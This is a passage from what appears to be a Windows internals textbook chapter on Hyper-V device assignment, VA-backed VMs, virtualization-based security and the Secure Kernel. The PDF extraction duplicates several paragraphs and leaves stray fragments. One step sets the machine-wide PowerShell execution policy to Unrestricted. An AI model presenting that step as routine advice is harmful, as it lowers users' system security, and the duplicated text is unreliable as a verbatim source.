As explained at https://docs.microsoft.com/en-us/virtualization/community/team-blog/2015
/20151120-discrete-device-assignment-machines-and-devices, for being able to be reassigned,
a device should have certain characteristics, such as supporting message-signaled interrupts
and memory-mapped I/O. Furthermore, the machine in which the hypervisor runs should sup-
port SR-IOV and have a proper I/O MMU. For this experiment, you should start by verifying that
the SR-IOV standard is enabled in the system BIOS (not explained here; the procedure varies
based on the manufacturer of your machine).
The next step is to download a PowerShell script that verifies whether your NVMe control-
ler is compatible with Discrete Device Assignment. You should download the survey-dda.ps1
PowerShell script from https://github.com/MicrosoftDocs/Virtualization-Documentation/tree
/master/hyperv-samples/benarm-powershell/DDA. Open an administrative PowerShell window
(by typing PowerShell in the Cortana search box and selecting Run As Administrator) and
check whether the PowerShell script execution policy is set to unrestricted by running the Get-
ExecutionPolicy command. If the command yields some output different than Unrestricted,
you should type the following: Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy
Unrestricted, press Enter, and confirm with Y.
If you execute the downloaded survey-dda.ps1 script, its output should highlight whether
your NVMe device can be reassigned to the guest VM. Here is a valid output example:
Standard NVM Express Controller
Express Endpoint -- more secure.
And its interrupts are message-based, assignment can work.
PCIROOT(0)#PCI(0302)#PCI(0000)
EXPERIMENT: Mapping a hardware-accelerated NVMe disk to a VM
As explained in the previous section, physical devices that support SR-IOV and DDE technologies
can be directly mapped in a guest VM running in a Windows Server 2019 host. In this experiment,
we are mapping an NVMe disk, which is connected to the system through the PCI-Ex bus and
supports DDE, to a Windows 10 VM. (Windows Server 2019 also supports the direct assignment
of a graphics card, but this is outside the scope of this experiment.)
As explained at https://docs.microsoft.com/en-us/virtualization/community/team-blog/2015
/20151120-discrete-device-assignment-machines-and-devices, for being able to be reassigned,
a device should have certain characteristics, such as supporting message-signaled interrupts
and memory-mapped I/O. Furthermore, the machine in which the hypervisor runs should sup-
port SR-IOV and have a proper I/O MMU. For this experiment, you should start by verifying that
the SR-IOV standard is enabled in the system BIOS (not explained here; the procedure varies
based on the manufacturer of your machine).
The next step is to download a PowerShell script that verifies whether your NVMe control-
ler is compatible with Discrete Device Assignment. You should download the survey-dda.ps1
PowerShell script from https://github.com/MicrosoftDocs/Virtualization-Documentation/tree
/master/hyperv-samples/benarm-powershell/DDA. Open an administrative PowerShell window
(by typing PowerShell in the Cortana search box and selecting Run As Administrator) and
check whether the PowerShell script execution policy is set to unrestricted by running the Get-
ExecutionPolicy command. If the command yields some output different than Unrestricted,
ExecutionPolicy command. If the command yields some output different than Unrestricted,
ExecutionPolicy
you should type the following: Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy
Unrestricted, press Enter, and confirm with
Enter, and confirm with
Enter
Y.Y.Y
If you execute the downloaded survey-dda.ps1 script, its output should highlight whether
your NVMe device can be reassigned to the guest VM. Here is a valid output example:
Standard NVM Express Controller
Express Endpoint -- more secure.
And its interrupts are message-based, assignment can work.
PCIROOT(0)#PCI(0302)#PCI(0000)
CHAPTER 9 Virtualization technologies
335
Take note of the location path (the PCIROOT(0)#PCI(0302)#PCI(0000) string in the example).
Now we will set the automatic stop action for the target VM as turned-off (a required step for
DDA) and dismount the device. In our example, the VM is called “Vibranium.” Write the following
commands in your PowerShell window (by replacing the sample VM name and device location
with your own):
Set-VM -Name "Vibranium" -AutomaticStopAction TurnOff
Dismount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
In case the last command yields an operation failed error, it is likely that you haven’t disabled the
device. Open the Device Manager, locate your NVMe controller (Standard NVMe Express Controller
in this example), right-click it, and select Disable Device. Then you can type the last command again.
It should succeed this time. Then assign the device to your VM by typing the following:
Add-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName "Vibranium"
The last command should have completely removed the NVMe controller from the host. You
should verify this by checking the Device Manager in the host system. Now it’s time to power
up the VM. You can use the Hyper-V Manager tool or PowerShell. If you start the VM and get an
error like the following, your BIOS is not properly configured to expose SR-IOV, or your I/O MMU
doesn’t have the required characteristics (most likely it does not support I/O remapping).
Otherwise, the VM should simply boot as expected. In this case, you should be able to see
both the NVMe controller and the NVMe disk listed in the Device Manager applet of the child
VM. You can use the disk management tool to create partitions in the child VM in the same way
you do in the host OS. The NVMe disk will run at full speed with no performance penalties (you
can confirm this by using any disk benchmark tool).
To properly remove the device from the VM and remount it in the host OS, you should first
shut down the VM and then use the following commands (remember to always change the vir-
tual machine name and NVMe controller location):
Remove-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName
"Vibranium"
Mount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
After the last command, the NVMe controller should reappear listed in the Device Manager of
the host OS. You just need to reenable it for restarting to use the NVMe disk in the host.
Take note of the location path (the PCIROOT(0)#PCI(0302)#PCI(0000) string in the example).
Now we will set the automatic stop action for the target VM as turned-off (a required step for
DDA) and dismount the device. In our example, the VM is called “Vibranium.” Write the following
commands in your PowerShell window (by replacing the sample VM name and device location
with your own):
Set-VM -Name "Vibranium" -AutomaticStopAction TurnOff
Dismount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
In case the last command yields an operation failed error, it is likely that you haven’t disabled the
device. Open the Device Manager, locate your NVMe controller (Standard NVMe Express Controller
Device Manager, locate your NVMe controller (Standard NVMe Express Controller
Device Manager
in this example), right-click it, and select Disable Device. Then you can type the last command again.
It should succeed this time. Then assign the device to your VM by typing the following:
Add-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName "Vibranium"
The last command should have completely removed the NVMe controller from the host. You
should verify this by checking the Device Manager in the host system. Now it’s time to power
up the VM. You can use the Hyper-V Manager tool or PowerShell. If you start the VM and get an
error like the following, your BIOS is not properly configured to expose SR-IOV, or your I/O MMU
doesn’t have the required characteristics (most likely it does not support I/O remapping).
Otherwise, the VM should simply boot as expected. In this case, you should be able to see
both the NVMe controller and the NVMe disk listed in the Device Manager applet of the child
VM. You can use the disk management tool to create partitions in the child VM in the same way
you do in the host OS. The NVMe disk will run at full speed with no performance penalties (you
can confirm this by using any disk benchmark tool).
To properly remove the device from the VM and remount it in the host OS, you should first
shut down the VM and then use the following commands (remember to always change the vir-
tual machine name and NVMe controller location):
Remove-VMAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)" -VMName
"Vibranium"
Mount-VMHostAssignableDevice -LocationPath "PCIROOT(0)#PCI(0302)#PCI(0000)"
After the last command, the NVMe controller should reappear listed in the Device Manager of
the host OS. You just need to reenable it for restarting to use the NVMe disk in the host.
336
CHAPTER 9 Virtualization technologies
VA-backed virtual machines
Virtual machines are being used for multiple purposes. One of them is to properly run traditional
software in isolated environments, called containers. (Server and application silos, which are two types
of containers, have been introduced in Part 1, Chapter 3, “Processes and jobs.”) Fully isolated containers
(internally named Xenon and Krypton) require a fast-startup type, low overhead, and the possibility of
getting the lowest possible memory footprint. Guest physical memory of this type of VM is generally
shared between multiple containers. Good examples of containers are provided by Windows Defender
Application Guard, which uses a container to provide the full isolation of the browser, or by Windows
Sandbox, which uses containers to provide a fully isolated virtual environment. Usually a container
shares the same VM’s firmware, operating system, and, often, also some applications running in it (the
shared components compose the base layer of a container). Running each container in its private guest
physical memory space would not be feasible and would result in a high waste of physical memory.
To solve the problem, the virtualization stack provides support for VA-backed virtual machines.
VA-backed VMs use the host’s operating system’s memory manager to provide to the guest parti-
tion’s physical memory advanced features like memory deduplication, memory trimming, direct maps,
memory cloning and, most important, paging (all these concepts have been extensively covered in
Chapter 5 of Part 1). For traditional VMs, guest memory is assigned by the VID driver by statically allo-
cating system physical pages from the host and mapping them in the GPA space of the VM before any
virtual processor has the chance to execute, but for VA-backed VMs, a new layer of indirection is added
between the GPA space and SPA space. Instead of mapping SPA pages directly into the GPA space, the
VID creates a GPA space that is initially blank, creates a user mode minimal process (called VMMEM) for
hosting a VA space, and sets up GPA to VA mappings using MicroVM. MicroVM is a new component of
the NT kernel tightly integrated with the NT memory manager that is ultimately responsible for man-
aging the GPA to SPA mapping by composing the GPA to VA mapping (maintained by the VID) with the
VA to SPA mapping (maintained by the NT memory manager).
The new layer of indirection allows VA-backed VMs to take advantage of most memory manage-
ment features that are exposed to Windows processes. As discussed in the previous section, the VM
Worker process, when it starts the VM, asks the VID driver to create the partition’s memory block. In
case the VM is VA-backed, it creates the Memory Block Range GPA mapping bitmap, which is used to
keep track of the allocated virtual pages backing the new VM’s RAM. It then creates the partition’s RAM
memory, backed by a big range of VA space. The VA space is usually as big as the allocated amount of
VM’s RAM memory (note that this is not a necessary condition: different VA-ranges can be mapped
as different GPA ranges) and is reserved in the context of the VMMEM process using the native
NtAllocateVirtualMemory API.
If the “deferred commit” optimization is not enabled (see the next section for more details), the VID
driver performs another call to the NtAllocateVirtualMemory API with the goal of committing the en-
tire VA range. As discussed in Chapter 5 of Part 1, committing memory charges the system commit limit
but still doesn’t allocate any physical page (all the PTE entries describing the entire range are invalid
demand-zero PTEs). The VID driver at this stage uses Winhvr to ask the hypervisor to map the entire
partition’s GPA space to a special invalid SPA (by using the same HvMapGpaPages hypercall used for
standard partitions). When the guest partition accesses guest physical memory that is mapped in the
CHAPTER 9 Virtualization technologies
337
SLAT table by the special invalid SPA, it causes a VMEXIT to the hypervisor, which recognizes the special
value and injects a memory intercept to the root partition.
The VID driver finally notifies MicroVM of the new VA-backed GPA range by invoking the VmCreate
MemoryRange routine (MicroVM services are exposed by the NT kernel to the VID driver through a
Kernel Extension). MicroVM allocates and initializes a VM_PROCESS_CONTEXT data structure, which
contains two important RB trees: one describing the allocated GPA ranges in the VM and one describ-
ing the corresponding system virtual address (SVA) ranges in the root partition. A pointer to the al-
located data structure is then stored in the EPROCESS of the VMMEM instance.
When the VM Worker process wants to write into the memory of the VA-backed VM, or when a
memory intercept is generated due to an invalid GPA to SPA translation, the VID driver calls into the
MicroVM page fault handler (VmAccessFault). The handler performs two important operations: first,
it resolves the fault by inserting a valid PTE in the page table describing the faulting virtual page (more
details in Chapter 5 of Part 1) and then updates the SLAT table of the child VM (by calling the WinHvr
driver, which emits another HvMapGpaPages hypercall). Afterward, the VM’s guest physical pages can
be paged out simply because private process memory is normally pageable. This has the important
implication that it requires the majority of the MicroVM’s function to operate at passive IRQL.
Multiple services of the NT memory manager can be used for VA-backed VMs. In particular, clone
templates allow the memory of two different VA-backed VMs to be quickly cloned; direct map allows
shared executable images or data files to have their section objects mapped into the VMMEM process
and into a GPA range pointing to that VA region. The underlying physical pages can be shared between
different VMs and host processes, leading to improved memory density.
VA-backed VMs optimizations
As introduced in the previous section, the cost of a guest access to dynamically backed memory that
isn’t currently backed, or does not grant the required permissions, can be quite expensive: when a
guest access attempt is made to inaccessible memory, a VMEXIT occurs, which requires the hypervisor
to suspend the guest VP, schedule the root partition’s VP, and inject a memory intercept message to
it. The VID’s intercept callback handler is invoked at high IRQL, but processing the request and call-
ing into MicroVM requires running at PASSIVE_LEVEL. Thus, a DPC is queued. The DPC routine sets an
event that wakes up the appropriate thread in charge of processing the intercept. After the MicroVM
page fault handler has resolved the fault and called the hypervisor to update the SLAT entry (through
another hypercall, which produces another VMEXIT), it resumes the guest’s VP.
Large numbers of memory intercepts generated at runtime result in big performance penalties.
With the goal to avoid this, multiple optimizations have been implemented in the form of guest
enlightenments (or simple configurations):
I
Memory zeroing enlightenments
I
Memory access hints
I
Enlightened page fault
I
Deferred commit and other optimizations
338
CHAPTER 9 Virtualization technologies
Memory-zeroing enlightenments
To avoid information disclosure to a VM of memory artifacts previously in use by the root partition
or another VM, memory-backing guest RAM is zeroed before being mapped for access by the guest.
Typically, an operating system zeroes all physical memory during boot because on a physical system
the contents are nondeterministic. For a VM, this means that memory may be zeroed twice: once by the
virtualization host and again by the guest operating system. For physically backed VMs, this is at best a
waste of CPU cycles. For VA-backed VMs, the zeroing by the guest OS generates costly memory inter-
cepts. To avoid the wasted intercepts, the hypervisor exposes the memory-zeroing enlightenments.
When the Windows Loader loads the main operating system, it uses services provided by the UEFI
firmware to get the machine’s physical memory map. When the hypervisor starts a VA-backed VM, it
exposes the HvGetBootZeroedMemory hypercall, which the Windows Loader can use to query the list
of physical memory ranges that are actually already zeroed. Before transferring the execution to the
NT kernel, the Windows Loader merges the obtained zeroed ranges with the list of physical memory
descriptors obtained through EFI services and stored in the Loader block (further details on startup
mechanisms are available in Chapter 12). The NT kernel inserts the merged descriptor directly in the
zeroed pages list by skipping the initial memory zeroing.
In a similar way, the hypervisor supports the hot-add memory zeroing enlightenment with a simple
implementation: When the dynamic memory VSC driver (dmvsc.sys) initiates the request to add physi-
cal memory to the NT kernel, it specifies the MM_ADD_PHYSICAL_MEMORY_ALREADY_ZEROED flag,
which hints the Memory Manager (MM) to add the new pages directly to the zeroed pages list.
Memory access hints
For physically backed VMs, the root partition has very limited information about how guest MM
intends to use its physical pages. For these VMs, the information is mostly irrelevant because almost
all memory and GPA mappings are created when the VM is started, and they remain statically mapped.
For VA-backed VMs, this information can instead be very useful because the host memory manager
manages the working set of the minimal process that contains the VM’s memory (VMMEM).
The hot hint allows the guest to indicate that a set of physical pages should be mapped into the
guest because they will be accessed soon or frequently. This implies that the pages are added to the
working set of the minimal process. The VID handles the hint by telling MicroVM to fault in the physical
pages immediately and not to remove them from the VMMEM process’s working set.
In a similar way, the cold hint allows the guest to indicate that a set of physical pages should be un-
mapped from the guest because it will not be used soon. The VID driver handles the hint by forwarding
it to MicroVM, which immediately removes the pages from the working set. Typically, the guest uses
the cold hint for pages that have been zeroed by the background zero page thread (see Chapter 5 of
Part 1 for more details).
The VA-backed guest partition specifies a memory hint for a page by using the HvMemoryHeatHint
hypercall.
CHAPTER 9 Virtualization technologies
339
Enlightened page fault (EPF)
Enlightened page fault (EPF) handling is a feature that allows the VA-backed guest partition to resched-
ule threads on a VP that caused a memory intercept for a VA-backed GPA page. Normally, a memory
intercept for such a page is handled by synchronously resolving the access fault in the root partition
and resuming the VP upon access fault completion. When EPF is enabled and a memory intercept oc-
curs for a VA-backed GPA page, the VID driver in the root partition creates a background worker thread
that calls the MicroVM page fault handler and delivers a synchronous exception (not to be confused by
an asynchronous interrupt) to the guest’s VP, with the goal to let it know that the current thread caused
a memory intercept.
The guest reschedules the thread; meanwhile, the host is handling the access fault. Once the access
fault has been completed, the VID driver will add the original faulting GPA to a completion queue and
deliver an asynchronous interrupt to the guest. The interrupt causes the guest to check the completion
queue and unblock any threads that were waiting on EPF completion.
Deferred commit and other optimizations
Deferred commit is an optimization that, if enabled, forces the VID driver not to commit each backing
page until first access. This potentially allows more VMs to run simultaneously without increasing the
size of the page file, but, since the backing VA space is only reserved, and not committed, the VMs may
crash at runtime due to the commitment limit being reached in the root partition. In this case, there is
no more free memory available.
Other optimizations are available to set the size of the pages which will be allocated by the MicroVM
page fault handler (small versus large) and to pin the backing pages upon first access. This prevents
aging and trimming, generally resulting in more consistent performance, but consumes more memory
and reduces the memory density.
The VMMEM process
The VMMEM process exists mainly for two main reasons:
I
Hosts the VP-dispatch thread loop when the root scheduler is enabled, which represents the
guest VP schedulable unit
I
Hosts the VA space for the VA-backed VMs
The VMMEM process is created by the VID driver while creating the VM’s partition. As for regular
partitions (see the previous section for details), the VM Worker process initializes the VM setup through
the VID.dll library, which calls into the VID through an IOCTL. If the VID driver detects that the new par-
tition is VA-backed, it calls into the MicroVM (through the VsmmNtSlatMemoryProcessCreate function)
to create the minimal process. MicroVM uses the PsCreateMinimalProcess function, which allocates
the process, creates its address space, and inserts the process into the process list. It then reserves the
bottom 4 GB of address space to ensure that no direct-mapped images end up there (this can reduce
the entropy and security for the guest). The VID driver applies a specific security descriptor to the new
VMMEM process; only the SYSTEM and the VM Worker process can access it. (The VM Worker process
is launched with a specific token; the token’s owner is set to a SID generated from the VM’s unique
340
CHAPTER 9 Virtualization technologies
GUID.) This is important because the virtual address space of the VMMEM process could have been
accessible to anyone otherwise. By reading the process virtual memory, a malicious user could read the
VM private guest physical memory.
Virtualization-based security (VBS)
As discussed in the previous section, Hyper-V provides the services needed for managing and running
virtual machines on Windows systems. The hypervisor guarantees the necessary isolation between
each partition. In this way, a virtual machine can’t interfere with the execution of another one. In this
section, we describe another important component of the Windows virtualization infrastructure: the
Secure Kernel, which provides the basic services for the virtualization-based security.
First, we list the services provided by the Secure Kernel and its requirements, and then we describe
its architecture and basic components. Furthermore, we present some of its basic internal data struc-
tures. Then we discuss the Secure Kernel and Virtual Secure Mode startup method, describing its high
dependency on the hypervisor. We conclude by analyzing the components that are built on the top
of Secure Kernel, like the Isolated User Mode, Hypervisor Enforced Code Integrity, the secure software
enclaves, secure devices, and Windows kernel hot-patching and microcode services.
Virtual trust levels (VTLs) and Virtual Secure Mode (VSM)
As discussed in the previous section, the hypervisor uses the SLAT to maintain each partition in its
own memory space. The operating system that runs in a partition accesses memory using the stan-
dard way (guest virtual addresses are translated in guest physical addresses by using page tables).
Under the cover, the hardware translates all the partition GPAs to real SPAs and then performs the
actual memory access. This last translation layer is maintained by the hypervisor, which uses a sepa-
rate SLAT table per partition. In a similar way, the hypervisor can use SLAT to create different security
domains in a single partition. Thanks to this feature, Microsoft designed the Secure Kernel, which is
the base of the Virtual Secure Mode.
Traditionally, the operating system has had a single physical address space, and the software run-
ning at ring 0 (that is, kernel mode) could have access to any physical memory address. Thus, if any
software running in supervisor mode (kernel, drivers, and so on) becomes compromised, the entire
system becomes compromised too. Virtual secure mode leverages the hypervisor to provide new trust
boundaries for systems software. With VSM, security boundaries (described by the hypervisor using
SLAT) can be put in place that limit the resources supervisor mode code can access. Thus, with VSM,
even if supervisor mode code is compromised, the entire system is not compromised.
VSM provides these boundaries through the concept of virtual trust levels (VTLs). At its core, a VTL is
a set of access protections on physical memory. Each VTL can have a different set of access protections.
In this way, VTLs can be used to provide memory isolation. A VTL’s memory access protections can be
CHAPTER 9 Virtualization technologies
341
configured to limit what physical memory a VTL can access. With VSM, a virtual processor is always
running at a particular VTL and can access only physical memory that is marked as accessible through
the hypervisor SLAT. For example, if a processor is running at VTL 0, it can only access memory as
controlled by the memory access protections associated with VTL 0. This memory access enforcement
happens at the guest physical memory translation level and thus cannot be changed by supervisor
mode code in the partition.
VTLs are organized as a hierarchy. Higher levels are more privileged than lower levels, and higher
levels can adjust the memory access protections for lower levels. Thus, software running at VTL 1 can
adjust the memory access protections of VTL 0 to limit what memory VTL 0 can access. This allows
software at VTL 1 to hide (isolate) memory from VTL 0. This is an important concept that is the basis of
the VSM. Currently the hypervisor supports only two VTLs: VTL 0 represents the Normal OS execution
environment, which the user interacts with; VTL 1 represents the Secure Mode, where the Secure Kernel
and Isolated User Mode (IUM) runs. Because VTL 0 is the environment in which the standard operating
system and applications run, it is often referred to as the normal mode.
Note The VSM architecture was initially designed to support a maximum of 16 VTLs. At
the time of this writing, only 2 VTLs are supported by the hypervisor. In the future, it could
be possible that Microsoft will add one or more new VTLs. For example, latest versions
of Windows Server running in Azure also support Confidential VMs, which run their Host
Compatibility Layer (HCL) in VTL 2.
Each VTL has the following characteristics associated with it:
I
Memory access protection As already discussed, each virtual trust level has a set of guest
physical memory access protections, which defines how the software can access memory.
I
Virtual processor state A virtual processor in the hypervisor share some registers with each
VTL, whereas some other registers are private per each VTL. The private virtual processor state
for a VTL cannot be accessed by software running at a lower VTL. This allows for isolation of the
processor state between VTLs.
I
Interrupt subsystem Each VTL has a unique interrupt subsystem (managed by the hypervi-
sor synthetic interrupt controller). A VTL’s interrupt subsystem cannot be accessed by software
running at a lower VTL. This allows for interrupts to be managed securely at a particular VTL
without risk of a lower VTL generating unexpected interrupts or masking interrupts.
Figure 9-30 shows a scheme of the memory protection provided by the hypervisor to the Virtual
Secure Mode. The hypervisor represents each VTL of the virtual processor through a different VMCS
data structure (see the previous section for more details), which includes a specific SLAT table. In this
way, software that runs in a particular VTL can access just the physical memory pages assigned to its
level. The important concept is that the SLAT protection is applied to the physical pages and not to the
virtual pages, which are protected by the standard page tables.
342
CHAPTER 9 Virtualization technologies
System Physical Memory
Guest Physical to System Physical Memory Map (GPA -> SPA map)
Normal Mode (VTL 0) Memory Access Protections
Secure Mode (VTL 1) Memory Access Protections
Normal Mode
(VTL 0)
Shared Registers
Host Partition
User
Kernel
User
Kernel
Secure Mode
(VTL 1)
Hypervisor
VP 0
VMCS
VP 0
VTL 0
VTL 0 EPT
VTL 1 EPT
VMCS
VP 0
VTL 1
VP 0
Local APIC
Local APIC
Normal Mode
(VTL 0)
Shared Registers
User
Kernel
User
Kernel
Secure Mode
(VTL 1)
VP 1
VMCS
VP 1
VTL 0
VMCS
VP 1
VTL 1
VP 1
Local APIC
Local APIC
Normal Mode Device
Secure Mode Device
FIGURE 9-30 Scheme of the memory protection architecture provided by the hypervisor to VSM.
Services provided by the VSM and requirements
Virtual Secure Mode, which is built on the top of the hypervisor, provides the following services to the
Windows ecosystem:
I
Isolation IUM provides a hardware-based isolated environment for each software that runs
in VTL 1. Secure devices managed by the Secure Kernel are isolated from the rest of the system
and run in VTL 1 user mode. Software that runs in VTL 1 usually stores secrets that can’t be inter-
cepted or revealed in VTL 0. This service is used heavily by Credential Guard. Credential Guard
is the feature that stores all the system credentials in the memory address space of the LsaIso
trustlet, which runs in VTL 1 user mode.
I
Control over VTL 0 The Hypervisor Enforced Code Integrity (HVCI) checks the integrity and
the signing of each module that the normal OS loads and runs. The integrity check is done
entirely in VTL 1 (which has access to all the VTL 0 physical memory). No VTL 0 software can in-
terfere with the signing check. Furthermore, HVCI guarantees that all the normal mode memory
pages that contain executable code are marked as not writable (this feature is called W^X. Both
HVCI and W^X have been discussed in Chapter 7 of Part 1).
CHAPTER 9 Virtualization technologies
343
I
Secure intercepts VSM provides a mechanism to allow a higher VTL to lock down critical sys-
tem resources and prevent access to them by lower VTLs. Secure intercepts are used extensively
by HyperGuard, which provides another protection layer for the VTL 0 kernel by stopping mali-
cious modifications of critical components of the operating systems.
I
VBS-based enclaves A security enclave is an isolated region of memory within the address
space of a user mode process. The enclave memory region is not accessible even to higher
privilege levels. The original implementation of this technology was using hardware facilities
to properly encrypt memory belonging to a process. A VBS-based enclave is a secure enclave
whose isolation guarantees are provided using VSM.
I
Kernel Control Flow Guard VSM, when HVCI is enabled, provides Control Flow Guard
(CFG) to each kernel module loaded in the normal world (and to the NT kernel itself). Kernel
mode software running in normal world has read-only access to the bitmap, so an exploit
can’t potentially modify it. Thanks to this reason, kernel CFG in Windows is also known as
Secure Kernel CFG (SKCFG).
Note CFG is the Microsoft implementation of Control Flow Integrity, a technique that pre-
vents a wide variety of malicious attacks from redirecting the flow of the execution of a pro-
gram. Both user mode and Kernel mode CFG have been discussed extensively in Chapter 7
of Part 1.
I
Secure devices Secure devices are a new kind of devices that are mapped and managed en-
tirely by the Secure Kernel in VTL 1. Drivers for these kinds of devices work entirely in VTL 1 user
mode and use services provided by the Secure Kernel to map the device I/O space.
To be properly enabled and work correctly, the VSM has some hardware requirements. The host
system must support virtualization extensions (Intel VT-x, AMD SVM, or ARM TrustZone) and the SLAT.
VSM won’t work if one of the previous hardware features is not present in the system processor. Some
other hardware features are not strictly necessary, but in case they are not present, some security
premises of VSM may not be guaranteed:
I
An IOMMU is needed to protect against physical device DMA attacks. If the system processors
don’t have an IOMMU, VSM can still work but is vulnerable to these physical device attacks.
I
A UEFI BIOS with Secure Boot enabled is needed for protecting the boot chain that leads to
the startup of the hypervisor and the Secure Kernel. If Secure Boot is not enabled, the system is
vulnerable to boot attacks, which can modify the integrity of the hypervisor and Secure Kernel
before they have the chances to get executed.
Some other components are optional, but when they’re present they increase the overall security
and responsiveness of the system. The TPM presence is a good example. It is used by the Secure Kernel
to store the Master Encryption key and to perform Secure Launch (also known as DRTM; see Chapter 12
for more details). Another hardware component that can improve VSM responsiveness is the proces-
sor’s Mode-Based Execute Control (MBEC) hardware support: MBEC is used when HVCI is enabled to
protect the execution state of user mode pages in kernel mode. With Hardware MBEC, the hypervisor
344
CHAPTER 9 Virtualization technologies
can set the executable state of a physical memory page based on the CPL (kernel or user) domain of
the specific VTL. In this way, memory that belongs to user mode application can be physically marked
executable only by user mode code (kernel exploits can no longer execute their own code located in
the memory of a user mode application). In case hardware MBEC is not present, the hypervisor needs
to emulate it, by using two different SLAT tables for VTL 0 and switching them when the code execu-
tion changes the CPL security domain (going from user mode to kernel mode and vice versa produces
a VMEXIT in this case). More details on HVCI have been already discussed in Chapter 7 of Part 1.
EXPERIMENT: Detecting VBS and its provided services
In Chapter 12, we discuss the VSM startup policy and provide the instructions to manually enable
or disable Virtualization-Based Security. In this experiment, we determine the state of the differ-
ent features provided by the hypervisor and the Secure Kernel. VBS is a technology that is not
directly visible to the user. The System Information tool distributed with the base Windows instal-
lation is able to show the details about the Secure Kernel and its related technologies. You can
start it by typing msinfo32 in the Cortana search box. Be sure to run it as Administrator; certain
details require a full-privileged user account.
In the following figure, VBS is enabled and includes HVCI (specified as Hypervisor Enforced
Code Integrity), UEFI runtime virtualization (specified as UEFI Readonly), MBEC (specified as
Mode Based Execution Control). However, the system described in the example does not include
an enabled Secure Boot and does not have a working IOMMU (specified as DMA Protection in
the Virtualization-Based Security Available Security Properties line).
More details about how to enable, disable, and lock the VBS configuration are available in the
“Understanding the VSM policy” experiment of Chapter 12.
EXPERIMENT: Detecting VBS and its provided services
In Chapter 12, we discuss the VSM startup policy and provide the instructions to manually enable
or disable Virtualization-Based Security. In this experiment, we determine the state of the differ-
ent features provided by the hypervisor and the Secure Kernel. VBS is a technology that is not
directly visible to the user. The System Information tool distributed with the base Windows instal-
lation is able to show the details about the Secure Kernel and its related technologies. You can
start it by typing msinfo32 in the Cortana search box. Be sure to run it as Administrator; certain
details require a full-privileged user account.
In the following figure, VBS is enabled and includes HVCI (specified as Hypervisor Enforced
Code Integrity), UEFI runtime virtualization (specified as UEFI Readonly), MBEC (specified as
Mode Based Execution Control). However, the system described in the example does not include
an enabled Secure Boot and does not have a working IOMMU (specified as DMA Protection in
the Virtualization-Based Security Available Security Properties line).
More details about how to enable, disable, and lock the VBS configuration are available in the
“Understanding the VSM policy” experiment of Chapter 12.
CHAPTER 9 Virtualization technologies
345
The Secure Kernel
The Secure Kernel is implemented mainly in the securekernel.exe file and is launched by the Windows
Loader after the hypervisor has already been successfully started. As shown in Figure 9-31, the Secure
Kernel is a minimal OS that works strictly with the normal kernel, which resides in VTL 0. As for any
normal OS, the Secure Kernel runs in CPL 0 (also known as ring 0 or kernel mode) of VTL 1 and provides
services (the majority of them through system calls) to the Isolated User Mode (IUM), which lives
in CPL 3 (also known as ring 3 or user mode) of VTL 1. The Secure Kernel has been designed to be
as small as possible with the goal to reduce the external attack surface. It’s not extensible with exter-
nal device drivers like the normal kernel. The only kernel modules that extend their functionality are
loaded by the Windows Loader before VSM is launched and are imported from securekernel.exe:
I
Skci.dll Implements the Hypervisor Enforced Code Integrity part of the Secure Kernel
I
Cng.sys Provides the cryptographic engine to the Secure Kernel
I
Vmsvcext.dll Provides support for the attestation of the Secure Kernel components in
Intel TXT (Trusted Boot) environments (more information about Trusted Boot is available
in Chapter 12)
While the Secure Kernel is not extensible, the Isolated User Mode includes specialized processes
called Trustlets. Trustlets are isolated among each other and have specialized digital signature require-
ments. They can communicate with the Secure Kernel through syscalls and with the normal world
through Mailslots and ALPC. Isolated User Mode is discussed later in this chapter.
VSM Normal Mode (VTL 0)
VSM Secure Mode (VTL 1)
NTOS (Normal Kernel)
Process A
A Kernel
Data
Hypervisor
Secure Kernel
User-
Mode
(Ring 3)
Kernel-
Mode
(Ring 0)
User-
Mode
(Ring 3)
Kernel-
Mode
(Ring 0)
Process B
B Kernel
Data
C Kernel
Data
D Kernel
Data
Isolated
Process C
C Secure
Kernel
Data
Isolated
Process D
D Secure
Kernel
Data
FIGURE 9-31 Virtual Secure Mode Architecture scheme, built on top of the hypervisor.
Virtual interrupts
When the hypervisor configures the underlying virtual partitions, it requires that the physical proces-
sors produce a VMEXIT every time an external interrupt is raised by the CPU physical APIC (Advanced
Programmable Interrupt Controller). The hardware’s virtual machine extensions allow the hypervisor
to inject virtual interrupts to the guest partitions (more details are in the Intel, AMD, and ARM user
346
CHAPTER 9 Virtualization technologies
manuals). Thanks to these two facts, the hypervisor implements the concept of a Synthetic Interrupt
Controller (SynIC). A SynIC can manage two kind of interrupts. Virtual interrupts are interrupts de-
livered to a guest partition’s virtual APIC. A virtual interrupt can represent and be associated with a
physical hardware interrupt, which is generated by the real hardware. Otherwise, a virtual interrupt can
represent a synthetic interrupt, which is generated by the hypervisor itself in response to certain kinds
of events. The SynIC can map physical interrupts to virtual ones. A VTL has a SynIC associated with each
virtual processor in which the VTL runs. At the time of this writing, the hypervisor has been designed to
support 16 different synthetic interrupt vectors (only 2 are actually in use, though).
When the system starts (phase 1 of the NT kernel’s initialization) the ACPI driver maps each inter-
rupt to the correct vector using services provided by the HAL. The NT HAL is enlightened and knows
whether it’s running under VSM. In that case, it calls into the hypervisor for mapping each physical in-
terrupt to its own VTL. Even the Secure Kernel could do the same. At the time of this writing, though, no
physical interrupts are associated with the Secure Kernel (this can change in the future; the hypervisor
already supports this feature). The Secure Kernel instead asks the hypervisor to receive only the follow-
ing virtual interrupts: Secure Timers, Virtual Interrupt Notification Assist (VINA), and Secure Intercepts.
Note It’s important to understand that the hypervisor requires the underlying hardware to
produce a VMEXIT while managing interrupts that are only of external types. Exceptions are
still managed in the same VTL the processor is executing at (no VMEXIT is generated). If an
instruction causes an exception, the latter is still managed by the structured exception han-
dling (SEH) code located in the current VTL.
To understand the three kinds of virtual interrupts, we must first introduce how interrupts are man-
aged by the hypervisor.
In the hypervisor, each VTL has been designed to securely receive interrupts from devices associated
